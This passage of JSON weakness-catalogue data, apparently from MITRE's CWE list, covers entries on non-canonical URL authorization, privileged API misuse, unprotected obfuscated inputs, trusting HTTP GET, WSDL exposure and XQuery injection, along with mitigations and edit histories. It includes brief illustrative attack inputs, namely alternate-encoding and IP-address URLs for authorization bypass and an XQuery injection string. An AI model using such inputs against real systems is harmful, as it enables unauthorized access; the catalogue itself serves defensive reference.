Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker may be able to read sensitive data."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"An attacker may be able to cause a denial of service."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to gain privileges."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Make decisions on the server side based on file content and not on file name or extension."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"209"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-13","Modification_Comment":"Significant clarification of the weakness description."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Taking Actions based on File Name or Extension of a User Supplied File","attr":{"@_Date":"2008-10-14"}}}},"647":{"attr":{"@_ID":"647","@_Name":"Use of Non-Canonical URL Paths for Authorization Decisions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization.","Extended_Description":{"xhtml:p":["If an application defines policy namespaces and makes authorization decisions based on the URL, but it does not require or convert to a canonical URL before making the authorization decision, then it opens the application to attack. For example, if the application only wants to allow access to http://www.example.com/mypage, then the attacker might be able to bypass this restriction using equivalent URLs such as:","Therefore it is important to specify access control policy that is based on the path information in some canonical form with all alternate encodings rejected (which can be accomplished by a default deny rule)."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["http://WWW.EXAMPLE.COM/mypage","http://www.example.com/%6Dypage (alternate encoding)","http://192.168.1.1/mypage (IP address)","http://www.example.com/mypage/ (trailing /)","http://www.example.com:80/mypage"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"An attacker may be able to bypass the authorization mechanism to gain access to the otherwise-protected URL."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"If a non-canonical URL is used, the server may choose to return the contents of the file, instead of pre-processing the file (e.g. as a program)."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Make access control policy based on path information in canonical form. Use very restrictive regular expressions to validate that the path is in the expected form."},{"Phase":"Architecture and Design","Description":"Reject all alternate path encodings that are not in the expected canonical form."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Example from CAPEC (CAPEC ID: 4, \\"Using Alternative IP Address Encodings\\"). An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS02-J","Entry_Name":"Canonicalize path names before validating them"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Using Non-Canonical Paths for Authorization Decisions","attr":{"@_Date":"2008-10-14"}}}},"648":{"attr":{"@_ID":"648","@_Name":"Incorrect Use of Privileged APIs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly.","Extended_Description":{"xhtml:p":["When an application contains certain functions that perform operations requiring an elevated level of privilege, the caller of a privileged API must be careful to:","If the caller of the API does not follow these requirements, then it may allow a malicious user or process to elevate their privilege, hijack the process, or steal sensitive data.","For instance, it is important to know if privileged APIs do not shed their privileges before returning to the caller or if the privileged function might make certain assumptions about the data, context or state information passed to it by the caller. It is important to always know when and how privileged APIs can be called in order to ensure that their elevated level of privilege cannot be exploited."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["ensure that assumptions made by the APIs are valid, such as validity of arguments","account for known weaknesses in the design/implementation of the API","call the API from a safe context"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to elevate privileges."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker may be able to obtain sensitive information."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"An attacker may be able to execute code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Before calling privileged APIs, always ensure that the assumptions made by the privileged code hold true prior to making the call."},{"Phase":"Architecture and Design","Description":"Know architecture and implementation weaknesses of the privileged APIs and make sure to account for these weaknesses before calling the privileged APIs to ensure that they can be called safely."},{"Phase":"Implementation","Description":"If privileged APIs make certain assumptions about data, context or state validity that are passed by the caller, the calling code must ensure that these assumptions have been validated prior to making the call."},{"Phase":"Implementation","Description":"If privileged APIs do not shed their privilege prior to returning to the calling code, then calling code needs to shed these privileges immediately and safely right after the call to the privileged APIs. In particular, the calling code needs to ensure that a privileged thread of execution will never be returned to the user or made available to user-controlled processes."},{"Phase":"Implementation","Description":"Only call privileged APIs from safe, consistent and expected state."},{"Phase":"Implementation","Description":"Ensure that a failure or an error will not leave a system in a state where privileges are not properly shed and privilege escalation is possible (i.e. fail securely with regards to handling of privileges)."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0645","Description":"A Unix utility that displays online help files, if installed setuid, could allow a local attacker to gain privileges when a particular file-opening function is called.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0645"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"107"}},{"attr":{"@_CAPEC_ID":"234"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Improper Use of Privileged APIs","attr":{"@_Date":"2009-05-27"}}}},"649":{"attr":{"@_ID":"649","@_Name":"Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the software does not use integrity checks to detect if those inputs have been modified.","Extended_Description":"When an application relies on obfuscation or incorrectly applied / weak encryption to protect client-controllable tokens or parameters, that may have an effect on the user state, system state, or some decision made on the server. Without protecting the tokens/parameters for integrity, the application is vulnerable to an attack where an adversary traverses the space of possible values of the said token/parameter in order to attempt to gain an advantage. The goal of the attacker is to find another admissible value that will somehow elevate their privileges in the system, disclose information or change the behavior of the system in some way beneficial to the attacker. If the application does not protect these critical tokens/parameters for integrity, it will not be able to determine that these values have been tampered with. Measures that are used to protect data for confidentiality should not be relied upon to provide the integrity service.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"The inputs could be modified without detection, causing the software to have unexpected system state or make incorrect security decisions."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect important client controllable tokens/parameters for integrity using PKI methods (i.e. digital signatures) or other means, and checks for integrity on the server side."},{"Phase":"Architecture and Design","Description":"Repeated requests from a particular user that include invalid values of tokens/parameters (those that should not be changed manually by users) should result in the user account lockout."},{"Phase":"Architecture and Design","Description":"Client side tokens/parameters should not be such that it would be easy/predictable to guess another valid state."},{"Phase":"Architecture and Design","Description":"Obfuscation should not be relied upon. If encryption is used, it needs to be properly applied (i.e. proven algorithm and implementation, use padding, use random initialization vector, user proper encryption mode). Even with proper encryption where the ciphertext does not leak information about the plaintext or reveal its structure, compromising integrity is possible (although less likely) without the provision of the integrity service."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-0039","Description":"An IPSec configuration does not perform integrity checking of the IPSec packet as the result of either not configuring ESP properly to support the integrity service or using AH improperly. In either case, the security gateway receiving the IPSec packet would not validate the integrity of the packet to ensure that it was not changed. Thus if the packets were intercepted the attacker could undetectably change some of the bits in the packets. The meaningful bit flipping was possible due to the known weaknesses in the CBC encryption mode. Since the attacker knew the structure of the packet, they were able (in one variation of the attack) to use bit flipping to change the destination IP of the packet to the destination machine controlled by the attacker. And so the destination security gateway would decrypt the packet and then forward the plaintext to the machine controlled by the attacker. The attacker could then read the original message. For instance if VPN was used with the vulnerable IPSec configuration the attacker could read the victim\'s e-mail. This vulnerability demonstrates the need to enforce the integrity service properly when critical data could be modified by an attacker. This problem might have also been mitigated by using an encryption mode that is not susceptible to bit flipping attacks, but the preferred mechanism to address this problem still remains message verification for integrity. While this attack focuses on the network layer and requires an entity that controls part of the communication path such as a router, the situation is not much different at the software level, where an attacker can modify tokens/parameters used by the application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0039"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Description, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Relying on Obfuscation or Encryption with no Integrity Checking to Protect User Controllable Parameters that are Used to Determine User or System State","attr":{"@_Date":"2008-04-11"}}}},"650":{"attr":{"@_ID":"650","@_Name":"Trusting HTTP Permission Methods on the Server Side","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state.","Extended_Description":"The HTTP GET method and some other methods are designed to retrieve resources and not to alter the state of the application or resources on the server side. Furthermore, the HTTP specification requires that GET requests (and other requests) should not have side effects. Believing that it will be enough to prevent unintended resource alterations, an application may disallow the HTTP requests to perform DELETE, PUT and POST operations on the resource representation. However, there is nothing in the HTTP protocol itself that actually prevents the HTTP GET method from performing more than just query of the data. Developers can easily code programs that accept a HTTP GET request that do in fact create, update or delete data on the server. For instance, it is a common practice with REST based Web Services to have HTTP GET requests modifying resources on the server side. However, whenever that happens, the access control needs to be properly enforced in the application. No assumptions should be made that only HTTP DELETE, PUT, POST, and other methods have the power to alter the representation of the resource being accessed in the request.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could escalate privileges."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify resources."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker could obtain sensitive information."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Configure ACLs on the server side to ensure that proper level of access control is defined for each accessible resource representation."}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"651":{"attr":{"@_ID":"651","@_Name":"Exposure of WSDL File Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return).","Extended_Description":{"xhtml:p":"An information exposure may occur if any of the following apply:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["The WSDL file is accessible to a wider audience than intended.","The WSDL file contains information on the methods/services that should not be publicly accessible or information about deprecated methods. This problem is made more likely due to the WSDL often being automatically generated from the code.","Information in the WSDL file helps guess names/locations of methods/resources that should not be publicly accessible."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The attacker may find sensitive information located in the WSDL file."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Limit access to the WSDL file as much as possible. If services are provided only to a limited number of entities, it may be better to provide WSDL privately to each of these entities than to publish WSDL publicly."},{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Make sure that WSDL does not describe methods that should not be publicly accessible. Make sure to protect service methods that should not be publicly accessible with access controls."},{"Phase":"Architecture and Design","Description":"Do not use method names in WSDL that might help an adversary guess names of private methods/resources used by the service."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The WSDL for a service providing information on the best price of a certain item exposes the following method: float getBestPrice(String ItemID) An attacker might guess that there is a method setBestPrice (String ItemID, float Price) that is available and invoke that method to try and change the best price of a given item to their advantage. The attack may succeed if the attacker correctly guesses the name of the method, the method does not have proper access controls around it and the service itself has the functionality to update the best price of the item."}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak through WSDL File","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through WSDL File","attr":{"@_Date":"2020-02-24"}}]}},"652":{"attr":{"@_ID":"652","@_Name":"Improper Neutralization of Data within XQuery Expressions (\'XQuery Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.","Extended_Description":"The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"91","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker might be able to read sensitive information from the XML database."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use parameterized queries. This will help ensure separation between data plane and control plane."},{"Phase":"Implementation","Description":"Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XQL queries is safe in that context."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An attacker may pass XQuery expressions embedded in an otherwise standard XML document. The attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back. doc(accounts.xml)//user[name=\'*\'] The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":46,"Entry_Name":"XQuery Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, 